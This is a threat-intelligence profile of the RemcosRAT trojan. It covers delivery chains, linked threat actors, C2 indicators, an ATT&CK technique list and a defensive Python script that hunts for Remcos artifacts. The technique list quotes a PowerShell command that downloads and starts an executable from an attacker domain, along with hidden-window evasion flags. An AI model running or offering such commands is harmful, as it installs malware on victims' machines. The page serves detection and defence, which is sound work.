RemcosRAT
RemcosRAT is a full-featured remote access trojan used across a wide range of criminal and espionage-motivated campaigns. The provided reporting consistently describes capabilities including remote command execution, file and process management, keylogging, screenshot capture, webcam and microphone surveillance, clipboard monitoring, browser and application data theft, and credential harvesting. Observed configurations include storage of keylogs in logs.dat, screenshot capture at 10-second intervals, audio recording in 5-second clips, mutexes such as Rmc-E3G25N and Rmc-3UG3BG, install names such as remcos.exe, and registry persistence under HKCU\Software\Remcos. RemcosRAT configurations were noted as RC4-encrypted in PE resources, and some infrastructure exposed the default Remcos TLS certificate profile with empty subject/issuer fields and long-lived validity dates.
In the supplied content, RemcosRAT is delivered through multiple infection vectors: phishing emails with business, legal, invoice, purchase inquiry, court summons, SWIFT transfer, and procurement lures; malicious HTA, JavaScript, XLS macro, SVG, MSI, ZIP, RAR, 7z, LNK, DOC/DOCX, VBS, PowerShell, and AutoIt stages; DLL sideloading with signed VMware and Microsoft Edge binaries; process hollowing into legitimate Microsoft binaries including Aspnet_compiler.exe and Msbuild.exe; counterfeit VeraCrypt installers; illegal gambling-related tools; and loader ecosystems such as HijackLoader, SHADOWLADDER, GHOSTPULSE, GoLoader, Amadey, and crypter-as-a-service AutoIt stubs. Specific observed chains include a four-stage March 2026 campaign using a JavaScript attachment, PowerShell decryption, a .NET loader named DEV.dll, and hollowing into Aspnet_compiler.exe, with C2 at 216.250.249.222 over raw TCP on ports 80 and 443; and an HTA-based RemcosRAT 7.2.0 Pro campaign tagged "SkyLNK" using mshta.exe, PowerShell, obfuscated JavaScript, reflective .NET loading, and hollowing into Msbuild.exe, with C2 domain goodpeopleswhitbrigheartwinthisindustryi.duckdns.org:14646 and staging at 96.44.159.218.
The malware appears in both commodity cybercrime and state-linked activity. The content links RemcosRAT to UAC-0184 targeting Ukraine’s Defense Forces via messenger-based social engineering to steal documents and messenger data, including Signal-related data; to UAC-0050 / DaVinci Group activity targeting Ukraine and a European financial institution; to campaigns targeting Russian organizations alongside DarkTrack RAT; to attacks targeting Ukraine; to Red Akodon phishing campaigns against Colombian victims; to Shadow Vector campaigns in Colombia; to South Korean campaigns using gambling lures and trojanized VeraCrypt installers; and to North Korean KONNI/Konni-linked activity using KakaoTalk-delivered malware. It is also repeatedly listed as a payload distributed by Amadey pay-per-install operations and by the GoLoader loader-as-a-service framework.
High-confidence indicators and artifacts directly mentioned in the content include C2 and staging infrastructure such as the-new-age.co.ua:443, biches-yeah.co.ua:443, 178.33.57.149:443, 178.33.57.159:8899, 88.151.192.14:443, 216.250.249.222:80/443, 96.44.159.137 ports 14641/14642/14645/14646/14647, 96.44.159.218, and goodpeopleswhitbrigheartwinthisindustryi.duckdns.org:14646; sample and campaign artifacts including DEV.dll GUID ab88dfb2-73aa-4da1-bf05-e72424ad8034, Remcos license hash 72214B9FB81C38C5D9F33A771B74F635, botnet ID "SkyLNK," and imphash 737fc4be4f9f7d7c06c790667c9f7669. The content also notes repeated use of RemcosRAT in campaigns targeting government, healthcare, technology, manufacturing, defense, finance, and telecom-related victims across multiple regions.
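The artifacts above (the HKCU\Software\Remcos persistence key, the Rmc- mutex names, logs.dat, the DuckDNS C2 domain and the listed C2 addresses) are concrete enough to hunt for in endpoint and network telemetry. The following is an added example written for this page, not code from the original reporting or from any vendor: it matches a constructed, simplified event feed against those indicators and grades each hit by how specific it is to Remcos. The event schema, the sample events and the assumption that other Remcos mutexes share the Rmc- plus six alphanumerics shape of the two named above are all constructed for illustration.

```python
"""Hunt for the RemcosRAT host and network artifacts described above.

Added example for this page (not the page's or any vendor's code).  The
telemetry format and the sample events are constructed; indicator values
come from the write-up above.
"""
import re
from dataclasses import dataclass

# --- Indicator values taken from the write-up above -----------------------
REMCOS_REGISTRY_KEY = r"HKCU\Software\Remcos"
# Assumption: mutexes follow the shape of the two observed ones (Rmc-E3G25N, Rmc-3UG3BG).
REMCOS_MUTEX_RE = re.compile(r"^Rmc-[A-Z0-9]{6}$")
REMCOS_INSTALL_NAMES = {"remcos.exe"}
KEYLOG_FILE = "logs.dat"            # common name, so only a medium-confidence lead
C2_IPS = {
    "216.250.249.222", "96.44.159.218", "96.44.159.137",
    "178.33.57.149", "178.33.57.159", "88.151.192.14",
}
C2_PORTS = {14641, 14642, 14645, 14646, 14647, 8899}   # observed Remcos listener ports
C2_DOMAINS = {
    "goodpeopleswhitbrigheartwinthisindustryi.duckdns.org",
    "the-new-age.co.ua",
    "biches-yeah.co.ua",
}


@dataclass(frozen=True)
class Hit:
    event_id: int
    indicator: str
    confidence: str   # "high" = specific to Remcos, "medium" = needs corroboration


def check_event(event: dict) -> list[Hit]:
    """Return the indicator matches for one telemetry event (constructed schema)."""
    hits: list[Hit] = []
    kind = event["type"]
    if kind == "registry_write":
        if event["key"].lower().startswith(REMCOS_REGISTRY_KEY.lower()):
            hits.append(Hit(event["id"], "persistence key " + REMCOS_REGISTRY_KEY, "high"))
    elif kind == "mutex_create":
        if REMCOS_MUTEX_RE.match(event["name"]):
            hits.append(Hit(event["id"], "Remcos mutex " + event["name"], "high"))
    elif kind == "file_write":
        # Normalise slashes and take the file name only.
        name = event["path"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if name in REMCOS_INSTALL_NAMES:
            hits.append(Hit(event["id"], "install name " + name, "high"))
        elif name == KEYLOG_FILE:
            hits.append(Hit(event["id"], "keylog file " + name, "medium"))
    elif kind == "dns_query":
        qname = event["qname"].lower().rstrip(".")
        if qname in C2_DOMAINS:
            hits.append(Hit(event["id"], "known C2 domain " + qname, "high"))
        elif qname.endswith(".duckdns.org"):
            # Dynamic DNS is used for C2 resolution (T1568.002) but is not unique to Remcos.
            hits.append(Hit(event["id"], "DuckDNS lookup " + qname, "medium"))
    elif kind == "net_connect":
        if event["dst_ip"] in C2_IPS:
            hits.append(Hit(event["id"], "known C2 address " + event["dst_ip"], "high"))
        elif event["dst_port"] in C2_PORTS:
            hits.append(Hit(event["id"], f"Remcos-style port {event['dst_port']}", "medium"))
    return hits


def hunt(events: list[dict]) -> list[Hit]:
    """Run check_event over a whole feed and flatten the results."""
    return [hit for event in events for hit in check_event(event)]


# Constructed sample feed: mixes Remcos artifacts with benign-looking noise.
SAMPLE_EVENTS = [
    {"id": 1, "type": "registry_write", "key": r"HKCU\Software\Remcos"},
    {"id": 2, "type": "mutex_create", "name": "Rmc-E3G25N"},
    {"id": 3, "type": "file_write", "path": r"C:\Users\alice\AppData\Roaming\remcos\logs.dat"},
    {"id": 4, "type": "dns_query", "qname": "goodpeopleswhitbrigheartwinthisindustryi.duckdns.org"},
    {"id": 5, "type": "net_connect", "dst_ip": "216.250.249.222", "dst_port": 443},
    {"id": 6, "type": "net_connect", "dst_ip": "203.0.113.10", "dst_port": 443},   # no hit
    {"id": 7, "type": "mutex_create", "name": "Global\\SomeAppMutex"},              # no hit
    {"id": 8, "type": "dns_query", "qname": "someother.duckdns.org"},               # medium
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f"event {hit.event_id}: [{hit.confidence}] {hit.indicator}")
```

Medium hits (a logs.dat write, a DuckDNS lookup, a connection to one of the listed ports) should be treated as pivots to corroborate against the high-confidence artifacts on the same host rather than as alerts on their own.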
Groups observed using it
7 distinct threat actors attributed by public researchers.
“These installers executed AutoIt scripts… that deployed multiple RATs (RemcosRAT, QuasarRAT, and RftRAT)…”
The files distributed were malicious AutoIt scripts and modules that enable remote access and keylogging, as well as various RATs, including LilithRAT and RemcosRAT.
Red Akodon targets users... using remote access trojans (RAT) like RemcosRAT, QuasarRAT, AsyncRAT, and XWorm.
"...and remote access trojans such as RemcosRAT in attacks targeting Ukraine."
"...to attack Russian organizations... with malware like RemcosRAT and DarkTrack RAT..."
Techniques & procedures
35 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
[Resource Development] Virtual Private Server (T1583.003) - PFCLOUD, ThinkHuge, OMEGATECH
Initial Access
2 techniques
[Initial Access] Phishing: Spearphishing Attachment (T1566.001) - Email with "Bank slip.exe", "Payment Advice.exe"
the main channel for delivering malware is popular messengers, and the initial intrusion methods involve the use of social engineering elements
Execution
7 techniques
[Execution] Windows Management Instrumentation (T1047) - Win32_Process.Create() hidden window launch
The PowerShell runs with the standard evasion flags: -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden.
[Execution] VBScript (T1059.005) - HTA VBScript execution in mshta.exe
[Execution] JavaScript (T1059.007) - WScript execution of obfuscated JS dropper
[Execution] Command and Scripting: AutoIt (T1059.010) - AutoIt-compiled loader with WRSJLIM cipher
[Execution] Shared Modules (T1129) - .NET Assembly.Load() for DEV.dll reflective loading
during which the latter is sent a file (archive) with a request to help open/process it
Persistence
1 technique
Privilege Escalation
4 techniques
[Defense Evasion] Process Injection (T1055) - VirtualAlloc RWX + DllCallAddress shellcode execution
[Defense Evasion] Process Hollowing (T1055.012) - Aspnet_compiler.exe hollowed via NT API
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Patchhelp_beta.lnk ... Streamsvc.lnk ... appBg.lnk
[Privilege Escalation] Bypass UAC (T1548.002) - Registry: EnableLUA = 0 modification
Stealth
8 techniques
[Defense Evasion] Obfuscated Files or Information (T1027) - Whitespace padding, random case, base64, delimiter-based concatenation
[Defense Evasion] Masquerading (T1036) - Abuse of Msbuild.exe as LOLBin host
[Defense Evasion] Masquerading: Invalid Code Signature (T1036.001) - Stolen/abused code signing certs
[Defense Evasion] Deobfuscate/Decode Files (T1140) - Base64, UTF-16LE, delimiter stripping
[Defense Evasion] Virtualization/Sandbox Evasion (T1497) - 3-second sleep timer
[Defense Evasion] Reflective Code Loading (T1620) - Go-based reflective PE loader (both v1 and v2)
Credential Access
2 techniques
[Credential Access] Keylogging (T1056.001) - Continuous keylogging to logs.dat
[Credential Access] Credentials from Password Stores (T1555) - Outlook credential theft via Nirsoft tools
Discovery
1 technique
Collection
5 techniques
[Credential Access] Keylogging (T1056.001) - Continuous keylogging to logs.dat
[Collection] Screen Capture (T1113) - Periodic screenshots to Screenshots/ directory
[Collection] Email Collection (T1114) - Outlook account access
[Collection] Audio Capture (T1123) - 5-second audio recording clips
[Collection] Video Capture (T1125) - Camera access via OpenCamera/CloseCamera
Command and Control
8 techniques
[Command and Control] Application Layer Protocol (T1071) - TLS-encrypted C2 on port 14646
The RAT -- compiled February 3, 2026 -- phones home to a dedicated C2 at 216.250.249.222 on ports 80 and 443 using Remcos proprietary protocol (not HTTP, not TLS -- raw TCP masquerading on web ports).
[Command and Control] Web Service (T1102) - Paste services (pastefy.app, pastes.io) for payload hosting
-uri http://yeah-biches.kyiv.ua/securitycheck.exe -OutFile securitycheck.exe; start securitycheck.exe
[Command and Control] Dynamic Resolution (T1568.002) - DuckDNS for C2 domain resolution
[Command and Control] Non-Standard Port (T1571) - Remcos protocol on ports 80/443 (not HTTP/TLS)
[Command and Control] Encrypted Channel (T1573) - Optional TLS mode available in configuration
Exfiltration
1 technique
SIGTOP and TUSC are used to steal and exfiltrate data from the computer
IOCs tracked for this family
84 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
22 sources tracked across advisories, community write-ups, and news.
A remote access trojan mentioned as one of the payloads delivered by PhantomVAI in other campaigns.
A commercial remote access trojan abused in cybercrime campaigns. In this campaign it is delivered through a four-stage chain, process-hollowed into Aspnet_compiler.exe, and used for surveillance and remote control including keylogging, camera access, audio recording, screenshots, file management, command execution, and watchdog behavior.
A remote access trojan observed among the malware families delivered by the same AutoIt crypter operation.
A remote access trojan delivered by the same JavaScript wrapper technique in the broader campaign wave.